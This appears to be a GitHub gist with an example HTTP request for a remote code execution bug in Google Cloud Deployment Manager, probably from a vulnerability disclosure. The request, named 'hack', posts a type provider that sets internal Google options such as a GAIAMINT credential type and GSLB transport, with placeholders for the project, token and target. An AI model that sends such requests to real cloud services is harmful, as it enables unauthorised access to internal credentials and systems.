Example request for Cloud Deployment Manager RCE bug
POST https://www.googleapis.com/deploymentmanager/staging_dogfood/projects/<PROJECT>/global/typeProviders?access_token=<TOKEN> HTTP/1.1 | |
{ | |
"name": "hack", | |
"descriptorUrl": "https://<GSLB target's path to a descriptor document>", | |
"googleOptions": { | |
"gslbTarget": <GSLB target name>, | |
"descriptorUrlServerSpec": <GSLB target name>, | |
"ownershipKind": "GOOGLE", | |
"credentialType": "GAIAMINT", | |
"transport": "GSLB" | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment